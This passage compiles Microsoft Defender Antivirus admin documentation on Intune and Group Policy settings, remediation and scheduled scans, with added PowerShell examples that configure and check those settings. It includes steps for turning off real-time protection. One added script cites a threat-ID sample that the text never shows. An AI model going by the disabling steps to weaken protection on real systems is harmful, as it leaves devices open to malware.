3. Select an existing policy, or choose + Create Policy to create a new policy.

Task: Create a new policy for Windows devices

1. In the Create a profile step, in the Platform list, select Windows 10, Windows 11, and Windows Server. For Profile, select Microsoft Defender Antivirus. Then choose Create.

2. On the Basics step, type a name and description for your policy, and then choose Next.

3. On the Configuration settings step, expand Defender, select the settings you want to use for your policy, and then choose Next. To get help with your settings, refer to Policy CSP - Defender.

4. On the Scope tags step, choose Select scope tags to open the Select tags pane to assign scope tags to the profile, and then select Next to continue.

5. On the Assignments page, select the groups to receive this profile, and then select Next. For more information on assigning profiles, see Assign user and device profiles.

6. On the Review + create page, when you're done, choose Create. The new profile is displayed in the list when you select the policy type for the profile you created.

Task: Create a new policy for macOS devices

1. In the Create a profile step, in the Platform list, select macOS. For Profile, select Antivirus. Then choose Create.

2. On the Basics step, type a name and description for your policy, and then choose Next.

3. On the Configuration settings step, select the settings you want to use for your policy, and then choose Next. To get help with your settings, refer to Set preferences for Microsoft Defender for Endpoint on macOS.

4. On the Scope tags step, choose Select scope tags to open the Select tags pane to assign scope tags to the profile, and then select Next to continue.

5. On the Assignments page, select the groups to receive this profile, and then select Next. For more information on assigning profiles, see Assign user and device profiles.

6. On the Review + create page, when you're done, choose Create. The new profile is displayed in the list when you select the policy type for the profile you created.

Task: Edit an existing policy for Windows devices

1. Select an antivirus policy for Windows devices.

2. Next to Configuration settings, choose Edit.

3. Expand Defender, and then edit settings for your policy. To get help with your settings, refer to Policy CSP - Defender.

4. Select Review + save, and then select Save.

Task: Edit an existing policy for macOS devices

1. Select an antivirus policy for macOS devices.

2. Select Properties, and then, next to Configuration settings, choose Edit.

3. Under Microsoft Defender for Endpoint, edit settings for your policy. To get help with your settings, refer to Set preferences for Microsoft Defender for Endpoint on macOS.

4. Select Review + save, and then select Save.

Are you using Group Policy?

Important

We recommend using Microsoft Intune to manage Microsoft Defender Antivirus settings for your organization. With Intune, you can control where tamper protection is enabled (or disabled) through policies. You can also protect Microsoft Defender Antivirus exclusions. For more information, see Protect Microsoft Defender Antivirus exclusions from tampering.

You can use Group Policy to manage some Microsoft Defender Antivirus settings. Note
that if tamper protection is enabled in your organization, any changes made to tamper-
protected settings are ignored. You can't turn off tamper protection by using Group
Policy.

If you must make changes to a device and those changes are blocked by tamper
protection, we recommend using troubleshooting mode to temporarily disable tamper
protection on the device. Note that after troubleshooting mode ends, any changes
made to tamper-protected settings are reverted to their configured state.

You can use Local Group Policy Editor to enable and configure Microsoft Defender
Antivirus always-on protection settings.

Enable and configure always-on protection using Group Policy
1. Open Local Group Policy Editor, as follows:

a. In your Windows 10 or Windows 11 taskbar search box, type gpedit.

b. Under Best match, select Edit group policy to launch Local Group Policy Editor.

2. In the left pane of Local Group Policy Editor, expand the tree to Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus.

3. Configure the Microsoft Defender Antivirus antimalware service policy setting. In the Microsoft Defender Antivirus details pane on right, double-click Allow antimalware service to start up with normal priority, and set it to Enabled. Then select OK.

4. Configure the Microsoft Defender Antivirus real-time protection policy settings, as follows:

a. In the Microsoft Defender Antivirus details pane, double-click Real-time Protection. Or, from the Microsoft Defender Antivirus tree on left pane, select Real-time Protection.

b. In the Real-time Protection details pane on right, double-click the policy setting as specified in Real-time protection policy settings (later in this article).

c. Configure the setting as appropriate, and select OK.

d. Repeat the previous steps for each setting in the table.

5. Configure the Microsoft Defender Antivirus scanning policy setting, as follows:

a. From the Microsoft Defender Antivirus tree on left pane, select Scan.

b. In the Scan details pane on right, double-click Turn on heuristics, and set it to
Enabled.

c. Select OK.

6. Close Local Group Policy Editor.

Real-time protection policy settings
For the most current settings, get the latest ADMX files in your central store. See How to create and manage the Central Store for Group Policy Administrative Templates in Windows and download the latest files.

Disable real-time protection in Group Policy

Warning

Disabling real-time protection drastically reduces the protection on your endpoints and is not recommended. In addition, if tamper protection is enabled, you cannot turn it off by using Group Policy. If you must make changes to a device and those changes are blocked by tamper protection, we recommend using troubleshooting mode to temporarily disable tamper protection on the device. Note that after troubleshooting mode ends, any changes made to tamper-protected settings are reverted to their configured state.

1. Open Local Group Policy Editor.

a. In your Windows 10 or Windows 11 taskbar search box, type gpedit.

b. Under Best match, select Edit group policy to launch Local Group Policy Editor.

2. In the left pane of Local Group Policy Editor, expand the tree to Computer Configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Real-time Protection.

3. In the Real-time Protection details pane on right, double-click Turn off real-time protection.

4. In the Turn off real-time protection setting window, set the option to Enabled.

5. Select OK.

6. Close Local Group Policy Editor.

See also
Configure behavioral, heuristic, and real-time protection
Microsoft Defender Antivirus in Windows 10

If you're looking for antivirus-related information for other platforms, see:

- Set preferences for Microsoft Defender for Endpoint on macOS
- Microsoft Defender for Endpoint on Mac
- macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
- Set preferences for Microsoft Defender for Endpoint on Linux
- Microsoft Defender for Endpoint on Linux
- Configure Defender for Endpoint on Android features
- Configure Microsoft Defender for Endpoint on iOS features


Configure remediation for Microsoft Defender Antivirus detections
Article • 09/15/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender Antivirus

Platforms

Windows

When Microsoft Defender Antivirus runs a scan, it attempts to remediate or remove threats that are detected. Remediation actions can include removing a file, sending it to quarantine, or allowing it to remain. This article includes information and links to resources about specifying what actions should be taken when threats are detected on devices. You can choose from several methods, such as:

- Microsoft Intune
- Microsoft Configuration Manager
- Group Policy
- PowerShell or Windows Management Instrumentation (WMI)

Important

Microsoft Defender Antivirus detects and remediates files based on many factors. Sometimes, completing a remediation requires a reboot. Even if the detection is later determined to be a false positive, the reboot must be completed to ensure all additional remediation steps have been completed.

If you are certain Microsoft Defender Antivirus quarantined a file based on a false positive, you can restore the file from quarantine after the device reboots. See Restore quarantined files in Microsoft Defender Antivirus. To avoid this problem in the future, you can exclude files from the scans. See Configure and validate exclusions for Microsoft Defender Antivirus scans.

Also see Configure remediation-required scheduled full Microsoft Defender Antivirus scans for more remediation-related settings.

Configure remediation options using Intune
1. As a global or security administrator, go to the Intune admin center and sign in.

2. Under Manage, choose Antivirus.

3. Either create a new policy, or edit an existing policy using the following settings:

- Platform: Windows 10, Windows 11, and Windows Server
- Profile: Microsoft Defender Antivirus

4. For configuration settings, expand Defender, scroll down to Allow On Access Protection, and set it to Allowed.

5. Under Allow On Access Protection, select a remediation action for each level:

- High severity threats
- Severe threats
- Moderate severity threats
- Low severity threats

6. Specify the device groups that should receive this policy (such as All Devices).

7. Review your settings, and then choose Save.

For more information about antivirus policies in Intune, see Antivirus policy for endpoint
security in Intune.

Configure remediation options using Configuration Manager
If you're using Configuration Manager, see the following articles:

- Configure Endpoint Protection in Configuration Manager
- Default Actions Settings

Configure remediation options using Group Policy
1. On your Group Policy management computer, open the Group Policy Management Console, and edit the Group Policy Object you want to configure.

2. In the Group Policy Management Editor, go to Computer configuration and then select Administrative templates.

3. Expand the tree to Windows components > Microsoft Defender Antivirus.

4. Using the following table, edit the policy as needed.

Location > Setting | Description | Default setting (if not configured)
Scan > Create a system restore point. | A system restore point is created each day before cleaning or scanning is attempted. | Disabled
Scan > Turn on removal of items from scan history folder. | Specify how many days items should be kept in the scan history. | 30 days
Root > Turn off routine remediation. | Specify whether Microsoft Defender Antivirus automatically remediates threats, or whether to prompt the user. | Disabled. Threats are remediated automatically.
Quarantine > Configure removal of items from Quarantine folder. | Specify how many days items should be kept in quarantine before being removed. | 90 days
Threats > Specify threat alert levels at which default action shouldn't be taken when detected. | Every threat that is detected by Microsoft Defender Antivirus is assigned a threat level (low, medium, high, or severe). You can use this setting to define how all threats for each of the threat levels should be remediated (quarantined, removed, or ignored). | Not applicable
Threats > Specify threats upon which default action shouldn't be taken when detected. | Specify how specific threats (using their threat ID) should be remediated. You can specify whether the specific threat should be quarantined, removed, or ignored. | Not applicable

5. Select OK.

Configure remediation options using PowerShell or WMI
You can also use the Set-MpPreference PowerShell cmdlet or MSFT_MpPreference WMI class to configure these settings.
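
An added example, not the article's own code, that applies the settings from the table above through Set-MpPreference and reads them back. It assumes an elevated PowerShell session on Windows; the Test-RemediationSettings helper, the numeric ThreatAction mapping, and the per-threat override (reusing the threat ID from the Get-MpThreat sample earlier on this page) are this example's own assumptions.

```powershell
# Added example, not part of the Microsoft article. Applies the remediation
# settings from the Group Policy table above with Set-MpPreference and then
# verifies them. Assumes an elevated PowerShell session on Windows.

# Changes to tamper-protected settings are ignored, so report that up front.
if ((Get-MpComputerStatus).IsTamperProtected) {
    Write-Warning 'Tamper protection is on; protected settings will not change.'
}

# Desired state. Threat-level actions accept Clean, Quarantine, Remove, Allow,
# UserDefined, NoAction or Block.
$remediation = @{
    SevereThreatDefaultAction      = 'Remove'
    HighThreatDefaultAction        = 'Quarantine'
    ModerateThreatDefaultAction    = 'Quarantine'
    LowThreatDefaultAction         = 'Quarantine'
    DisableRestorePoint            = $false   # "Create a system restore point"
    ScanPurgeItemsAfterDelay       = 30       # scan history retention, days
    QuarantinePurgeItemsAfterDelay = 90       # quarantine retention, days
}
Set-MpPreference @remediation

# Per-threat override ("Specify threats upon which default action shouldn't be
# taken"): pin the threat ID from the article's Get-MpThreat sample to
# Quarantine regardless of its level default. Assumed here for illustration.
Set-MpPreference -ThreatIDDefaultAction_Ids @(213927) `
                 -ThreatIDDefaultAction_Actions @('Quarantine')

# Get-MpPreference reports actions numerically; assumed ThreatAction mapping.
$actionNames = @{ 0 = 'Default'; 1 = 'Clean'; 2 = 'Quarantine'; 3 = 'Remove';
                  6 = 'Allow'; 8 = 'UserDefined'; 9 = 'NoAction'; 10 = 'Block' }

function Test-RemediationSettings {
    # Hypothetical helper: returns one line per setting that differs from $Expected.
    param([hashtable]$Expected)
    $pref  = Get-MpPreference
    $drift = @()
    foreach ($name in $Expected.Keys) {
        $actual = $pref.$name
        # Threat-level actions come back as codes; compare them by name.
        if ($name -like '*ThreatDefaultAction') { $actual = $actionNames[[int]$actual] }
        if ("$actual" -ne "$($Expected[$name])") {
            $drift += "$name expected $($Expected[$name]), found $actual"
        }
    }
    return $drift
}

$drift = @(Test-RemediationSettings -Expected $remediation)
if ($drift.Count -eq 0) { 'Remediation settings match the desired state.' }
else { $drift }
```
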

See also
Microsoft Defender for Endpoint on Mac
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features


Configure scheduled quick or full Microsoft Defender Antivirus scans
Article • 12/14/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender Antivirus

Platforms

Windows

You can set up regular, scheduled antivirus scans on devices. These scheduled scans are
in addition to always-on, real-time protection and on-demand antivirus scans. When
you schedule a scan, you can specify the type of scan, when the scan should occur, and
if the scan should occur after a protection update or when a device isn't being used. You
can also set up special scans to complete remediation actions if needed.

- Compare the quick scan, full scan, and custom scan
- Choose a scan type
- Keep these important points
- Try the scheduled quick scan performance optimization
- Additional resources

Comparing the quick scan, full scan, and custom scan
The following table describes the different types of scans you can configure.

Quick scan (recommended)
A quick scan looks at all the locations where there could be malware registered to start with the system, such as registry keys and known Windows startup folders.

A quick scan helps provide strong protection against malware that starts with the system and kernel-level malware, together with always-on real-time protection, which reviews files when they're opened and closed, and whenever a user navigates to a folder.

In most cases, a quick scan is sufficient and is the recommended option for scheduled scans. Starting with the December 2023 (4.18.2311.x.x) release of Platform Update, you have the option to have all files and directories that are excluded from real-time protection using contextual exclusions scanned during a quick scan.

Full scan
A full scan starts by running a quick scan and then continues with a sequential file scan of all mounted fixed disks and removable/network drives (if the full scan is configured to do so).

A full scan can take a few hours or days to complete, depending on the amount and type of data that needs to be scanned.

When a full scan begins, it uses the security intelligence definitions installed at the time the scan starts. If new security intelligence updates are made available during the full scan, another full scan is required in order to scan for new threat detections contained in the latest update.

Because of the time and resources involved in a full scan, in general, we don't recommend scheduling full scans.

Custom scan
A custom scan runs on files and folders that you specify. For example, you can choose to scan a USB drive or a specific folder on your device's local drive.

Note

By default, quick scans run on mounted removable devices, such as USB drives.

How to choose a scan type
Use the following table to choose a scan type.

Scenario | Recommended scan type
You want to set up regular, scheduled scans | Quick scan. A quick scan checks the processes, memory, profiles, and certain locations on the device. Together with always-on real-time protection, a quick scan helps provide strong coverage both for malware that starts with the system and kernel-level malware. Real-time protection reviews files when they're opened and closed, and whenever a user navigates to a folder.
Threats, such as malware, are detected on an individual device | Quick scan. In most cases, a quick scan will catch and clean up detected malware.
You want to run an on-demand scan | Quick scan
You want to make sure a portable device, such as a USB drive, doesn't contain malware | Custom scan. A custom scan enables you to select specific locations, folders, or files, and runs a quick scan.
You have installed or re-enabled Microsoft Defender Antivirus | Quick scan or full scan. A quick scan checks the processes, memory, profiles, and certain locations on the device. If you prefer, you can choose to run a full scan after you have enabled or installed Microsoft Defender Antivirus. Just keep in mind it can take a while to run a full scan.

Important points to keep in mind
- By default, Microsoft Defender Antivirus checks for an update 15 minutes before the time of any scheduled scans. You can manage the schedule for when protection updates should be downloaded and applied to override this default.

- If a device is unplugged and running on battery during a scheduled full scan, the scheduled scan stops with event 1002, which states that the scan stopped before completion. Microsoft Defender Antivirus runs a full scan at the next scheduled time.

- Scheduled scans run according to the local time zone of the device.

- Malicious files can be stored in locations that aren't included in a quick scan. However, always-on, real-time protection reviews all files that are opened and closed, and any files that are in folders that are accessed by a user. The combination of real-time protection and a quick scan helps provide strong protection against malware.

- On-access protection with cloud-delivered protection helps ensure that all the files accessed on the system are being scanned with the latest security intelligence and cloud machine learning models.

- When real-time protection detects malware and the extent of the affected files isn't determined initially, Microsoft Defender Antivirus initiates a full scan as part of the remediation process.

- If a device is offline for an extended period of time, a full scan can take longer to complete.

- You can configure quick scans to scan real-time protection exclusions by using PowerShell, Intune, or Group Policy.

Scheduled quick scan performance optimization
As a performance optimization, Microsoft Defender Antivirus skips running scheduled quick scans in some situations. This optimization only applies to a quick scan when initiated by a schedule; it doesn't affect a quick scan initiated by an on-demand antivirus scan. This optimization reduces performance degradation by avoiding running a quick scan when it isn't necessary and won't affect protection.

By default, if a qualified quick scan ran within the last seven days, a new quick scan won't be initiated. A quick scan is considered to be qualified if:

- The scan occurs after the last Security Intelligence Update was installed;
- Real-time protection wasn't disabled during that time period; and,
- The machine was rebooted.

This optimization doesn't apply to the following conditions:

- If Microsoft Defender for Endpoint is Managed
- If Microsoft Defender Endpoint Detection and Response (EDR) is installed
- If the computer was restarted since the last quick scan
- If real-time protection is disabled after the last quick scan occurred
- If the last initiated quick scan wasn't completed

This optimization applies to machines running Windows 10 Anniversary Update (version 1607) and all subsequent Windows releases, as well as Windows Server 2016 (version 1607) and subsequent Windows Server releases, but doesn't apply to Core Server installations.
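
An added example, not the article's own code, that sets up a daily scheduled quick scan with Set-MpPreference and reports whether the last quick scan still qualifies under the seven-day optimization described above. It assumes an elevated PowerShell session on Windows; the Get-QuickScanFreshness helper and its staleness rule (scan age, signature update time, and the current real-time protection state) are this example's own assumptions.

```powershell
# Added example, not part of the Microsoft article. Schedules a daily quick
# scan with Set-MpPreference and reports whether the last quick scan still
# counts as a qualified scan under the seven-day optimization described above.
# Assumes an elevated PowerShell session on Windows.

# Changes to tamper-protected settings are ignored; report that up front.
if ((Get-MpComputerStatus).IsTamperProtected) {
    Write-Warning 'Tamper protection is on; protected settings will not change.'
}

# Scheduled-scan settings (PowerShell equivalents of the Group Policy settings).
$schedule = @{
    ScanParameters             = 'QuickScan'  # quick scan, the recommended type
    ScanScheduleDay            = 'Everyday'   # Sunday..Saturday, Everyday or Never
    ScanScheduleTime           = '02:00:00'   # local time on the device
    ScanOnlyIfIdleEnabled      = $false       # do not wait for the device to be idle
    RandomizeScheduleTaskTimes = $true        # spread start times across a fleet
}
Set-MpPreference @schedule

function Get-QuickScanFreshness {
    # Hypothetical helper: summarises the facts behind the seven-day rule.
    $status   = Get-MpComputerStatus
    $lastBoot = (Get-CimInstance -ClassName Win32_OperatingSystem).LastBootUpTime
    $scanEnd  = $status.QuickScanEndTime
    $sigTime  = $status.AntivirusSignatureLastUpdated
    $neverScanned = ($null -eq $scanEnd)

    # A scan older than seven days or older than the latest security
    # intelligence update no longer qualifies. The rule also requires that
    # real-time protection stayed on; this check can only see its current state.
    $stale = $neverScanned -or
             ($status.QuickScanAge -gt 7) -or
             ($scanEnd -lt $sigTime) -or
             (-not $status.RealTimeProtectionEnabled)

    [pscustomobject]@{
        QuickScanEndTime      = $scanEnd
        QuickScanAgeDays      = $status.QuickScanAge
        SignatureLastUpdated  = $sigTime
        RebootedSinceLastScan = (-not $neverScanned) -and ($lastBoot -gt $scanEnd)
        RealTimeProtectionOn  = $status.RealTimeProtectionEnabled
        NewQuickScanDue       = $stale
    }
}

$freshness = Get-QuickScanFreshness
$freshness | Format-List

# Rather than wait for the schedule, run an on-demand quick scan now if the
# last one no longer qualifies.
if ($freshness.NewQuickScanDue) {
    Start-MpScan -ScanType QuickScan
}
```
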

See also
Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus
Onboard non-Windows devices


Schedule antivirus scans using Group Policy
Article • 03/07/2023

Applies to:

- Microsoft Defender for Endpoint Plan 1
- Microsoft Defender for Endpoint Plan 2
- Microsoft Defender Antivirus

Platforms

Windows

This article describes how to configure scheduled scans using Group Policy. To learn
more about scheduling scans and about scan types, see Configure scheduled quick or
full Microsoft Defender Antivirus scans.

Configure antivirus scans using Group Policy
1. On your Group Policy management machine, in the Group Policy Editor, go to Computer configuration > Administrative Templates > Windows Components > Microsoft Defender Antivirus > Scan.

2. Right-click the Group Policy Object you want to configure, and then select Edit.

3. Specify settings for the Group Policy Object, and then select OK.

4. Repeat steps 1-4 for each setting you want to configure.

5. Deploy your Group Policy Object as you normally do. If you need help with Group
Policy Objects, see Create a Group Policy Object.

7 Note

When configuring scheduled scans, the setting Start the scheduled scan only when
computer is on but not in use, which is enabled by default, can impact the
expected scheduled time by requiring the machine to be idle first.

For weekly scans, default behavior on Windows Server is to scan outside of
automatic maintenance when the machine is idle. The default on Windows 10 and
later is to scan during automatic maintenance when the machine is idle. To change
this behavior, disable ScanOnlyIfIdle, and then define a schedule.

For more information, see Manage when protection updates should be downloaded
and applied and Prevent or allow users to locally modify policy settings.

Group Policy settings for scheduling scans

Location | Setting | Description | Default setting (if not configured)
Scan | Specify the scan type to use for a scheduled scan | | Quick scan
Scan | Specify the day of the week to run a scheduled scan | Specify the day (or never) to run a scan. | Never
Scan | Specify the time of day to run a scheduled scan | Specify the number of minutes after midnight (for example, enter 60 for 1 a.m.). | 2 a.m.
Root | Randomize scheduled task times | In Microsoft Defender Antivirus, randomize the start time of the scan to any interval from 0 to 23 hours. By default, scheduled tasks will begin at a random time within four hours of the time specified in Task Scheduler. | Enabled

Group Policy settings for scheduling scans for when an endpoint is not in use

Location | Setting | Description | Default setting (if not configured)
Scan | Start the scheduled scan only when computer is on but not in use | Scheduled scans will not run, unless the computer is on but not in use | Enabled

7 Note

When you schedule scans for times when endpoints are not in use, scans do not
honor the CPU throttling configuration and will take full advantage of the resources
available to complete the scan as fast as possible.

Group Policy settings for scheduling remediation-required scans

Location | Setting | Description | Default setting (if not configured)
Remediation | Specify the day of the week to run a scheduled full scan to complete remediation | Specify the day (or never) to run a scan. | Never
Remediation | Specify the time of day to run a scheduled full scan to complete remediation | Specify the number of minutes after midnight (for example, enter 60 for 1 a.m.). | 2 a.m.

Group Policy settings for scheduling daily scans

Location | Setting | Description | Default setting (if not configured)
Scan | Specify the interval to run quick scans per day | Specify how many hours should elapse before the next quick scan. For example, to run every two hours, enter 2; for once a day, enter 24. Enter 0 to never run a daily quick scan. | Never
Scan | Specify the time for a daily quick scan | Specify the number of minutes after midnight (for example, enter 60 for 1 a.m.). | 2 a.m.

Group Policy settings for scheduling scans after protection updates

Location | Setting | Description | Default setting (if not configured)
Signature updates | Turn on scan after Security intelligence update | A scan will occur immediately after a new protection update is downloaded | Enabled
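
The following script is an added example and is not part of the Microsoft article. After
the GPO has applied, it reads back the scheduled-scan values the settings above write
under the Defender policy registry key, decodes them into the terms the tables use
(day codes, minutes after midnight), and compares them with what the engine reports.
The registry value names are taken from the Microsoft Defender Antivirus ADMX template
and are an assumption here; check them against the template version you deploy. Run it
in an elevated PowerShell session on a device that has applied the GPO.

```powershell
# Added example (not from the Microsoft article): decode the scheduled-scan policy
# values written by the Group Policy settings above and compare them with the engine.
# Value names follow the Microsoft Defender Antivirus ADMX (assumed; verify for your
# template version). Run elevated on a device that has applied the GPO.

$PolicyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'

# Day codes used by the "day of the week" settings.
$DayNames = @{
    0 = 'Every day'; 1 = 'Sunday'; 2 = 'Monday'; 3 = 'Tuesday'; 4 = 'Wednesday'
    5 = 'Thursday'; 6 = 'Friday'; 7 = 'Saturday'; 8 = 'Never'
}

function Get-PolicyValue {
    param([string]$SubKey, [string]$Name)
    $key = if ($SubKey) { Join-Path $PolicyRoot $SubKey } else { $PolicyRoot }
    $item = Get-ItemProperty -Path $key -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }   # "Not configured": the table default applies
    return $item.$Name
}

# The "time of day" settings store minutes after midnight; render as hh:mm.
function ConvertFrom-MinutesAfterMidnight {
    param([int]$Minutes)
    return ([TimeSpan]::FromMinutes($Minutes)).ToString('hh\:mm')
}

$scanType = Get-PolicyValue -SubKey 'Scan' -Name 'ScanParameters'
$day      = Get-PolicyValue -SubKey 'Scan' -Name 'ScheduleDay'
$time     = Get-PolicyValue -SubKey 'Scan' -Name 'ScheduleTime'
$idleOnly = Get-PolicyValue -SubKey 'Scan' -Name 'ScanOnlyIfIdle'
$quick    = Get-PolicyValue -SubKey 'Scan' -Name 'ScheduleQuickScanTime'
$interval = Get-PolicyValue -SubKey 'Scan' -Name 'QuickScanInterval'
$remDay   = Get-PolicyValue -SubKey 'Remediation' -Name 'Scan_ScheduleDay'
$remTime  = Get-PolicyValue -SubKey 'Remediation' -Name 'Scan_ScheduleTime'
$random   = Get-PolicyValue -Name 'RandomizeScheduleTaskTimes'

[pscustomobject]@{
    ScanType             = $(if ($null -eq $scanType) { 'Not configured (Quick scan)' } elseif ($scanType -eq 2) { 'Full scan' } else { 'Quick scan' })
    ScheduledScanDay     = $(if ($null -ne $day) { $DayNames[[int]$day] } else { 'Not configured (Never)' })
    ScheduledScanTime    = $(if ($null -ne $time) { ConvertFrom-MinutesAfterMidnight $time } else { 'Not configured (02:00)' })
    ScanOnlyWhenIdle     = $(if ($null -ne $idleOnly) { [bool]$idleOnly } else { 'Not configured (Enabled)' })
    DailyQuickScanTime   = $(if ($null -ne $quick) { ConvertFrom-MinutesAfterMidnight $quick } else { 'Not configured (02:00)' })
    QuickScanIntervalHrs = $(if ($null -ne $interval) { $interval } else { 'Not configured (Never)' })
    RemediationScanDay   = $(if ($null -ne $remDay) { $DayNames[[int]$remDay] } else { 'Not configured (Never)' })
    RemediationScanTime  = $(if ($null -ne $remTime) { ConvertFrom-MinutesAfterMidnight $remTime } else { 'Not configured (02:00)' })
    RandomizeTaskTimes   = $(if ($null -ne $random) { [bool]$random } else { 'Not configured (Enabled)' })
} | Format-List

# Cross-check against what the engine actually loaded. A mismatch usually means the GPO
# hasn't applied yet (gpupdate /force) or a local or Intune setting is winning.
Get-MpPreference | Select-Object ScanParameters, ScanScheduleDay, ScanScheduleTime,
    ScanOnlyIfIdleEnabled, ScanScheduleQuickScanTime, RemediationScheduleDay,
    RemediationScheduleTime, RandomizeScheduleTaskTimes
```

The policy hive is what the GPO writes; Get-MpPreference is what the engine is running
with. Comparing the two is the quickest way to tell a GPO that hasn't applied from a
setting that applied but is being overridden.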

 Tip

If you're looking for antivirus-related information for other platforms, see:

Set preferences for Microsoft Defender for Endpoint on macOS
Microsoft Defender for Endpoint on Mac
macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune
Set preferences for Microsoft Defender for Endpoint on Linux
Microsoft Defender for Endpoint on Linux
Configure Defender for Endpoint on Android features
Configure Microsoft Defender for Endpoint on iOS features

Schedule antivirus scans using
PowerShell
Article • 07/18/2023

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender Antivirus

Platforms

Windows
Windows Server

This article describes how to configure scheduled scans using PowerShell cmdlets. To
learn more about scheduling scans and about scan types, see Configure scheduled quick
or full Microsoft Defender Antivirus scans.

Use PowerShell cmdlets to schedule scans

Use the following cmdlets:

PowerShell

Set-MpPreference -ScanParameters
Set-MpPreference -ScanScheduleDay
Set-MpPreference -ScanScheduleTime
Set-MpPreference -RandomizeScheduleTaskTimes

For more information on how to use PowerShell with Microsoft Defender Antivirus, see
Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and Defender
Antivirus cmdlets.

PowerShell cmdlets for scheduling scans when an endpoint is not in use

Use the following cmdlets:

PowerShell

Set-MpPreference -ScanOnlyIfIdleEnabled

For more information, see Use PowerShell cmdlets to configure and run Microsoft
Defender Antivirus and Defender Antivirus cmdlets.

7 Note

When you schedule scans for times when endpoints are not in use, scans do not
honor the CPU throttling configuration and will take full advantage of the resources
available to complete the scan as fast as possible.

PowerShell cmdlets for scheduling scans to complete remediation

Use the following cmdlets:

PowerShell

Set-MpPreference -RemediationScheduleDay
Set-MpPreference -RemediationScheduleTime

See Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Defender Antivirus cmdlets for more information on how to use PowerShell with
Microsoft Defender Antivirus.

PowerShell cmdlets for scheduling daily scans

Use the following cmdlets:

PowerShell

Set-MpPreference -ScanScheduleQuickScanTime

For more information about how to use PowerShell with Microsoft Defender Antivirus,
see Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Defender Antivirus cmdlets.
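
The following script is an added example and is not part of the Microsoft article. It
puts the cmdlet parameters from the four sections above together into one schedule
(a weekly full scan, a daily remediation window, a daily quick scan, randomized start
times) and reads the result back. The day, time, and scan-type values are illustrative
choices. Run it in an elevated PowerShell session; on a device managed by Group Policy
or Intune, the managed setting overrides what you set locally.

```powershell
# Added example (not from the Microsoft article): configure a full scheduled-scan
# policy with Set-MpPreference and verify it. Values are illustrative. Run elevated.

# Day values: Everyday, Sunday ... Saturday, Never (stored as 0..7 and 8).
# Times are local times expressed as the offset after midnight.
$schedule = @{
    ScanParameters             = 'FullScan'    # 'QuickScan' (1) or 'FullScan' (2)
    ScanScheduleDay            = 'Saturday'
    ScanScheduleTime           = '02:00:00'
    RandomizeScheduleTaskTimes = $true         # spreads start times across a fleet
    ScanOnlyIfIdleEnabled      = $true         # idle-only scans ignore CPU throttling (see the note above)
    RemediationScheduleDay     = 'Everyday'    # full scan to finish remediation
    RemediationScheduleTime    = '03:00:00'
    ScanScheduleQuickScanTime  = '12:30:00'    # daily quick scan
}
Set-MpPreference @schedule

# Read back what the engine holds. Day values come back as numbers, times as TimeSpans.
$pref = Get-MpPreference
$pref | Select-Object ScanParameters, ScanScheduleDay, ScanScheduleTime,
    RandomizeScheduleTaskTimes, ScanOnlyIfIdleEnabled,
    RemediationScheduleDay, RemediationScheduleTime, ScanScheduleQuickScanTime

# Guard against the silent failure mode: a day of "Never" (8) means the weekly scan
# never runs, and a policy-managed device will keep the managed value, not yours.
if ($pref.ScanScheduleDay -eq 8) {
    Write-Warning 'ScanScheduleDay is Never; the weekly scan is not scheduled.'
}
if ($pref.ScanParameters -ne 2) {
    Write-Warning 'ScanParameters is not FullScan; a managed policy may be overriding the local setting.'
}
```

Splatting the settings through one Set-MpPreference call keeps the change atomic from
the operator's point of view; reading back with Get-MpPreference is the check that the
engine, not just the cmdlet, accepted the values.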

Schedule antivirus scans using Windows
Management Instrumentation (WMI)
Article • 02/21/2024

Applies to:

Microsoft Defender XDR
Microsoft Defender for Endpoint Plan 2
Microsoft Defender for Business
Microsoft Defender for Endpoint Plan 1
Microsoft Defender Antivirus

Platforms

Windows
Windows Server

This article describes how to configure scheduled scans using WMI. To learn more about
scheduling scans and about scan types, see Configure scheduled quick or full Microsoft
Defender Antivirus scans.

Use Windows Management Instrumentation (WMI) to schedule scans

Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

ScanParameters
ScanScheduleDay
ScanScheduleTime
RandomizeScheduleTaskTimes

For more information and allowed parameters, see Windows Defender WMIv2 APIs.

WMI for scheduling scans when an endpoint is not in use

Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

ScanOnlyIfIdleEnabled

For more information about APIs and allowed parameters, see Windows Defender
WMIv2 APIs.

7 Note

When you schedule scans for times when endpoints are not in use, scans do not
honor the CPU throttling configuration and will take full advantage of the resources
available to complete the scan as fast as possible.

WMI for scheduling scans to complete remediation

Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

RemediationScheduleDay
RemediationScheduleTime

For more information and allowed parameters, see Windows Defender WMIv2 APIs.

WMI for scheduling daily scans

Use the Set method of the MSFT_MpPreference class for the following properties:

WMI

ScanScheduleQuickScanTime

For more information and allowed parameters, see Windows Defender WMIv2 APIs.
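
The following script is an added example and is not part of the Microsoft article. It
drives the MSFT_MpPreference Set method from the sections above through the CIM
cmdlets, which is the path to take when you need to target a remote device rather than
the local one. The namespace and class name are Defender's own; the property values,
the remote host name, and the assumption that a [TimeSpan] converts to the class's
interval datetime properties are this example's, not the article's. Run elevated.

```powershell
# Added example (not from the Microsoft article): set scheduled-scan properties on the
# MSFT_MpPreference class via CIM, locally and against a remote device. Values are
# illustrative; the [TimeSpan] to CIM-interval conversion is assumed. Run elevated.

$ns = 'root/Microsoft/Windows/Defender'

# Local: read the current schedule from the class instance.
Get-CimInstance -Namespace $ns -ClassName MSFT_MpPreference |
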